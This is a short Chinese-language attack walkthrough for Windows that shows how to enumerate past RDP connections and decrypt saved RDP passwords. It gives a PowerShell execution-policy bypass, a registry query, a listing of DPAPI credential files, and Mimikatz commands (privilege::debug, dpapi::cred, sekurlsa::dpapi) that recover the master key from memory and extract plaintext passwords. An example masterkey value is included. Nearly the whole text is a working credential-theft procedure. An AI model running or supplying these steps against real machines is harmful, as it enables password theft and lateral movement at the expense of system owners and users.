https://github.com/3gstudent/List-RDP-Connections-History.git
powershell -exec bypass ./ListAllUser.ps1
本地RDP连接密码解密
• Mimikatz
查看本地机器本地连接过的目标机器:
reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /s
查看本地用户此目录下是否存有RDP密码文件:
dir /a %userprofile%\AppData\Local\Microsoft\Credentials*
mimikatz.exe
选择一个密码文件对其进行解密:
privilege::debug
此处的目录是上面目录的地址
dpapi::cred /in:C:\Users\zyl\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D(RDP密码文件)
此处需要记录下guidMasterKey的值,待会要通过
guidMasterKey找对应的Masterkey。
guidMasterKey : {1e75dd29-3c76-48fb-9ff8-94c1a464159d}
{1e75dd29-3c76-48fb-9ff8-94c1a464159d}
根据guidMasterKey找到对应的Masterkey:
sekurlsa::dpapi
通过Masterkey解密pbData数据,拿到明文RDP连接密码:
dpapi::cred /in:C:\Users\zyl\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:bdc48962ebfcb75e0faa66856f6cd42764c697640655269f25485feda687f7fabfe1db1e48c72cd79764ca79e0936ab675e441bb95f9025962998c78844876c3